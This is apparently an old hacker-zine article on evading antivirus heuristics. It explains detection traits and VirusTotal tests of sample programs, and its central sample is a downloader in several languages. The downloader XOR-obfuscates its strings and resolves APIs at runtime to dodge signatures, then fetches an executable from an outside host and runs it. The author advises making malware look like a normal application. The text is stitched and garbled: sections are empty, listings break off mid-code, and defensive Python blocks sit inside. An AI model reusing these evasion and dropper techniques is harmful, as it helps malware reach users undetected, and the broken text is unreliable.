/\\,/\\, ,, - -_,
/| || || _ ||; _ ; ( ~/|| ;
|| || || < \,||\\/\/\ < \,,._-__-_ \\/\ _-_,( / || \\/\ _-_,
||=|= || /-|||||| | | /-|| || || \\|| |||_. \/==|| || |||_.
~|| || ||(( |||||| | |(( || || ||/ || | ~ || /_ _|| || | ~ ||
|, \\,\\,\/\\\\\\/\\/ \/\\ \\,\\,/ \\/ , -_- ( - \\,\\/ , -_-
_-
------------------------][Malware vs Avs][---------------------
0x00 - Index
0x10 - Intro
0x20 - Avs
0x30 - Malware
0x40 - Avs Techniques
0x50 - Malware Techniques
0x60 - Examples
0x70 - Conclusion
0x80 - Credits/References
For the final part, I will show you some practical examples of basic
malware applications, written in the main programming languages available today (ASM,
C/C++, Visual Basic 6/.NET, Java), and see why an antivirus detects our application, or
doesn't detect it =).
+ ------------------------------------ +
Heuristics were introduced because of the growing number of malware creations:
according to F-Secure, in 2007 more malware was created than in the preceding 20 years
all together. In 1995 malware was gaining the upper hand over antivirus software, and
the antivirus companies reacted with heuristic technology.
- variable/memory emulator;
- parser;
- flow analyzer;
- code analyzer;
- disassembler/emulator;
- weight-based system and/or rule based system.
There are two types of scanning: signature scanning and heuristic scanning.
Signature scanning searches for specific byte sequences that occur in known malware,
such as the string "*.exe", certain Windows API names, and others.
Heuristic scanning is a lot more advanced than signature scanning: it searches for
instructions or commands within a program that are not found in typical applications.
Some characteristics can make malware detectable by an antivirus, and these
characteristics are:
[Characteristics]
- Executable
  - Incorrect timestamp;
- Entrypoint
  - Entrypoint location, if the entrypoint isn't in the first section;
- PE header data
  - PE header location;
  - Incorrect SizeOfImage;
  - Incorrect SizeOfCode;
  - PE header with incorrect parameters;
- Section characteristics
  - If the last section is executable;
  - If the first section is writable;
- Number of sections
  - Executable has only one section;
- Section names
  - Unknown section name;
  - Empty section name;
- Code
  - Differs from the standard code patterns of the language;
  - Code redirections;
  - Long loops/jumps;
File: /home/juza/Desktop/Malware vs Avs v1 Page 3 of 13
- Suspicious strings
  - "*.exe";
  - "CreateRemoteThread";
  - etc.
- etc...
[Emulation]
Each of these characteristics has a given weight; the sum of all the weights
indicates whether the file is malware or not.
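The weight-based scan described above, written out as an added example (it is not code from the article): a small Python header scanner that applies the PE checks listed here (entrypoint outside the first section, last section executable, first section writable, a single section, empty or unknown section names) to a constructed minimal PE header and sums the weights. The weights and the set of "known" section names are assumptions for illustration.

```python
import struct

# Section flags from the PE/COFF spec, and the section names a compiler normally emits.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
KNOWN_NAMES = {b".text", b".data", b".rdata", b".idata", b".rsrc", b".reloc", b".bss"}
# Weights are assumed for illustration; the article names the checks but gives no numbers.
WEIGHTS = {"entrypoint outside first section": 3, "last section executable": 2,
           "first section writable": 2, "only one section": 2,
           "empty section name": 1, "unknown section name": 1}

def build_pe(sections, entry):
    """Constructed minimal PE32 header; sections = [(name, VirtualAddress, VirtualSize, flags)]."""
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                            # AddressOfEntryPoint
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), vs, va, vs, 0, 0, 0, 0, 0, fl)
                     for n, va, vs, fl in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table

def parse_pe(pe):
    """Return (AddressOfEntryPoint, [(name, VirtualAddress, VirtualSize, flags), ...])."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    entry = struct.unpack_from("<I", pe, e_lfanew + 24 + 16)[0]
    base = e_lfanew + 24 + opt_size                                   # section table
    secs = [(n.rstrip(b"\0"), va, vs, fl) for n, vs, va, *_, fl in
            (struct.unpack_from("<8sIIIIIIHHI", pe, base + 40 * i) for i in range(nsec))]
    return entry, secs

def heuristic_score(pe):
    """Run the header checks and return (total weight, list of triggered checks)."""
    entry, secs = parse_pe(pe)
    first, last = secs[0], secs[-1]
    names = [s[0] for s in secs]
    checks = [
        (not first[1] <= entry < first[1] + first[2], "entrypoint outside first section"),
        (last[3] & IMAGE_SCN_MEM_EXECUTE, "last section executable"),
        (first[3] & IMAGE_SCN_MEM_WRITE, "first section writable"),
        (len(secs) == 1, "only one section"),
        (b"" in names, "empty section name"),
        (any(n and n not in KNOWN_NAMES for n in names), "unknown section name"),
    ]
    hits = [label for cond, label in checks if cond]
    return sum(WEIGHTS[h] for h in hits), hits
```

A compiler-built binary with .text/.data/.rsrc scores 0, while a header with an empty writable first section and an executable unnamed last section collects most of the weights; where to put the alert threshold is the false-positive trade-off the next paragraph describes.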
In short, heuristics are a very powerful technology, but they have imperfections:
heuristics can produce false positives. For example, a program designed to format hard disks,
defragment disks, etc. will be reported by some antivirus products as malware, or as infected.
Now, after all this, how can malware bypass this whole system called heuristics? Nowadays
malware also uses advanced techniques to avoid detection by antivirus, and these techniques are:
These are the main techniques for avoiding heuristic emulation. Just remember: your application
must look like any other normal application.
In this section we will build some basic programs, only to test the reactions of the AVs.
First of all, we will create a simple program that shows a message box and exits, just to see
the reactions.
MASM.
.386
.model flat, stdcall
option casemap:none
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib

.data
    _szMessage db "Juza", 0h
    _szText    db "The Puppet Master", 0h

.code
start:
    ; MessageBoxA(hWnd, lpText, lpCaption, uType): stdcall, arguments pushed right to left
    push 0                      ; uType = MB_OK
    push offset _szMessage      ; lpCaption
    push offset _szText         ; lpText
    push 0                      ; hWnd = NULL
    call MessageBoxA
    push 0                      ; uExitCode
    call ExitProcess
end start
Result : hxxp://www.virustotal.com/pt/analisis/1a00...31746fc0e0f1057
One AV, Prevx1, tells me that the code above is a Cloaked Malware, ummmm, very interesting, lol.
format PE GUI 4.0
entry start
include 'win32a.inc'

section '.data' data readable writeable
    ; the string definitions are not in the original listing; the texts are
    ; assumed to match the MASM version above
    _caption db 'Juza', 0
    _message db 'The Puppet Master', 0

section '.code' code readable executable
start:
    push MB_OK                  ; uType
    push _caption               ; lpCaption
    push _message               ; lpText
    push NULL                   ; hWnd
    call [MessageBox]
    push 0
    call [ExitProcess]

section '.idata' import data readable writeable
    library user,'USER32.dll',\
            kernel, 'KERNEL32.DLL'
    import user,\
           MessageBox,'MessageBoxA'
    import kernel,\
           ExitProcess, 'ExitProcess'
Result: hxxp://www.virustotal.com/pt/analisis/83b9...e57f99cdade57db
And now the most interesting thing: 5 AVs detect a potential virus, and just for
a simple message box.
#include <windows.h>
#ifndef null
#define null 0
#endif
Result: hxxp://www.virustotal.com/pt/analisis/fbfd...c15fdeef60c2fd5
Result: hxxp://www.virustotal.com/pt/analisis/0f76...40ab9d00c52d28c
' class name and the first handler parameter are not in the original listing;
' the standard WinForms designer defaults are assumed
Public Class Form1
    Private Sub Form1_Load(ByVal sender As System.Object, _
                           ByVal e As System.EventArgs) _
                           Handles MyBase.Load
        MessageBox.Show("Juza", "Juza", MessageBoxButtons.OK)
    End Sub
End Class
Result: hxxp://www.virustotal.com/pt/analisis/6c13...b75f1970099c5b5
Nothing.
import javax.swing.JApplet;
import javax.swing.JFrame;
import javax.swing.JOptionPane;
Result: hxxp://www.virustotal.com/analisis/f418982...016d9f5f9d1b6df
As I thought, nothing.
From these results we can draw a simple conclusion: the majority of AVs find it easier
to detect something strange in native Win32 applications. The same AVs that detected something
strange in the ASM message box (MASM, FASM) detected nothing in the framework-based languages,
VB.NET and Java, so we can conclude for now that AVs have difficulty emulating Java and .NET
based applications.
Now I will finish the tests with something simple, but something that every malware coder
has programmed before: I will test the AVs with a simple downloader, just to see the reactions.
In the case of the non-framework-based applications, we will have just one API; the rest will be
loaded at runtime, and a simple encryption function is used to prevent signature scanning.
MASM.
.386
.model flat, stdcall
option casemap:none
include kernel32.inc
include shell32.inc
includelib kernel32.lib
includelib shell32.lib

.data
    ; the strings are stored XOR-encoded with a one-byte key (the number after each ';'),
    ; so the plaintext URL, DLL and API names never appear in the file for a signature to match
    ;http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
    _szDownload db ".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 0h ;70
    _szDll      db "Afxy{z:pxx", 0h         ;20
    _szFunc     db "}zdlG_FDGIL|GnADMi", 0h ;40
    _szSp       db "a8^rwvv{,gzg", 0h       ;2
    _dwHDll     dd 0h
    _dwHFunc    dd 0h

.code
start:
    ; each loop XOR-decodes, in place, the NUL-terminated string whose address is in eax;
    ; the instructions that load eax and the LoadLibrary/GetProcAddress calls between the
    ; loops are not in this listing
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 20      ; key 20
    add eax, 1
    jmp @B
@@:
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 40      ; key 40
    add eax, 1
    jmp @B
@@:
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 70      ; key 70
    add eax, 1
    jmp @B
@@:
@@:
    cmp byte ptr [eax], 0h
    je @F
    xor byte ptr [eax], 2       ; key 2
    add eax, 1
    jmp @B
@@:
    ; call the API resolved at runtime (its address is expected in eax)
    push 0h
    push 0h
    push offset _szSp
    push offset _szDownload
    push 0h
    call eax
    push 5                      ;SW_SHOW
    push 0
    push 0
    push offset _szSp
    push 0
    push 0
    call ShellExecute
    push 0
    call ExitProcess
end start
Result: hxxp://www.virustotal.com/pt/analisis/b1f2...a734d9f65375736
Umm, this is a result that I did not expect: just 4 AVs, and the best ones don't detect it
(Kaspersky, Nod32).
include 'win32a.inc'
    _dwHDll  dd 0h
    _dwHFunc dd 0h
    ; same decode loops as the MASM version: XOR each byte of the string at eax
    ; until the NUL (the instructions loading eax and storing the handles are
    ; not in this listing)
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 20          ; key 20
    add eax, 1
    jmp @B
@@:
    push _szDll
    call [LoadLibrary]
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 40          ; key 40
    add eax, 1
    jmp @B
@@:
    push _szFunc
    push [_dwHFunc]
    call [GetProcAddress]
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 70          ; key 70
    add eax, 1
    jmp @B
@@:
@@:
    cmp byte [eax], 0h
    je @F
    xor byte [eax], 2           ; key 2
    add eax, 1
    jmp @B
@@:
    push 0h
    push 0h
    push _szSp
    push _szDownload
    push 0h
    call eax                    ; API resolved above
    push 5                      ;SW_SHOW
    push 0
    push 0
    push _szSp
    push 0
    push 0
    call [ShellExecute]
    push 0
    call [ExitProcess]

    library shell,'SHELL32.DLL',\
            kernel, 'KERNEL32.DLL'
    import kernel,\
           GetProcAddress, 'GetProcAddress',\
           LoadLibrary, 'LoadLibraryA',\
           ExitProcess, 'ExitProcess'
    import shell,\
           ShellExecute, 'ShellExecuteA'
Result: hxxp://www.virustotal.com/pt/analisis/44d2...9f51e1b46fb916a
                    h#>#", 70), _
                    decript("a8^rwvv{,gzg", 2), &H0, &H0
    Shell decript("a8^rwvv{,gzg", 2)
    Unload Me
End Sub

' XOR each character of szStr with intVal (the function header and declarations
' are not in the original listing and are reconstructed from the body)
Function decript(szStr As String, intVal As Integer) As String
    Dim i As Integer, a As Integer
    Dim szChar As String, szDump As String
    For i = 1 To Len(szStr)
        szChar = Mid(szStr, i, 1)
        a = intVal Xor Asc(szChar)
        szChar = Chr(a)
        szDump = szDump & szChar
    Next i
    decript = szDump
End Function
Result: hxxp://www.virustotal.com/pt/analisis/9f89a47f99d0e8c70320cd6335267d86
Visual Basic.Net
Imports System.IO
Imports System.Net
Imports System.Text
        Shell(decript("a8^rwvv{,gzg", 2))
        Me.Close()
    End Sub

    ' XOR each character of szStr with intVal (the function header and declarations
    ' are not in the original listing and are reconstructed from the body)
    Private Function decript(ByVal szStr As String, ByVal intVal As Integer) As String
        Dim i As Integer, a As Integer
        Dim szChar As String, szDump As String = ""
        For i = 1 To Len(szStr)
            szChar = Mid(szStr, i, 1)
            a = intVal Xor Asc(szChar)
            szChar = Chr(a)
            szDump = szDump & szChar
        Next i
        decript = szDump
    End Function
End Class
Result: hxxp://www.virustotal.com/pt/analisis/e5e3ab6de021d6d81570ce71f0539569
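The decode loops in the ASM listings and the VB decript function above all apply a single-byte XOR, which is trivial for an analyst to undo. As an added example (not code from the article), this Python script recovers the key of each of the article's four encoded strings without being told it, by trying all 256 keys and ranking the fully printable outputs by tokens a dropper's strings usually contain; the crib list and the ranking are assumptions of this example.

```python
import string

# Ciphertexts copied from the article's listings; the ;70 ;20 ;40 ;2 comments there
# are the single-byte XOR keys (decimal). Constructed sample set for this example.
SAMPLES = {
    "url":  b".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#",
    "dll":  b"Afxy{z:pxx",
    "func": b"}zdlG_FDGIL|GnADMi",
    "path": b"a8^rwvv{,gzg",
}
# Tokens an analyst expects in a dropper's strings: URLs, DLL/EXE names, API name fragments.
CRIBS = (b"http", b"://", b".dll", b".exe", b"Load", b"Proc",
         b"Download", b"File", b"Create", b"Write")
LETTERS = set(string.ascii_letters.encode())

def xor_bytes(data, key):
    """Single-byte XOR, the operation the decode loops and decript() perform in place."""
    return bytes(b ^ key for b in data)

def recover_xor_key(cipher):
    """Brute-force all 256 keys. Keep only fully printable outputs and rank them by
    crib hits, then by letter count. Returns (key, plaintext), or None if nothing fits."""
    best = None
    for key in range(256):
        plain = xor_bytes(cipher, key)
        if not all(0x20 <= b < 0x7F for b in plain):
            continue                                  # decoy keys rarely survive this
        rank = (sum(crib in plain for crib in CRIBS), sum(b in LETTERS for b in plain))
        if best is None or rank > best[0]:
            best = (rank, key, plain)
    return None if best is None else (best[1], best[2])

def recover_all(samples=SAMPLES):
    """Decode every sample; returns {label: (key, plaintext)}."""
    return {label: recover_xor_key(c) for label, c in samples.items()}
```

Run against the four samples it returns the keys 70, 20, 40 and 2 and the URL, DLL name, API name and drop path in clear, which is why the article's conclusion rests on emulation rather than on the encoding itself.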
JAVA
import java.io.*;
import java.net.*;
import java.util.concurrent.Executor;
        } else {
            System.err.println("Could not figure out local file name for " + address);
        }
    }
Result: hxxp://www.virustotal.com/analisis/a7cb0fb...4d620aebd4e11bd
Nothing, as I expected.
First of all, sorry that I didn't complete the code, but I have a lot of
work; if I win, I will finish it lol =), just kidding.
The more similarities your malware has to a normal application, the better its chances of avoiding
antivirus detection, by making the AVs think it is a normal application.
[Credits]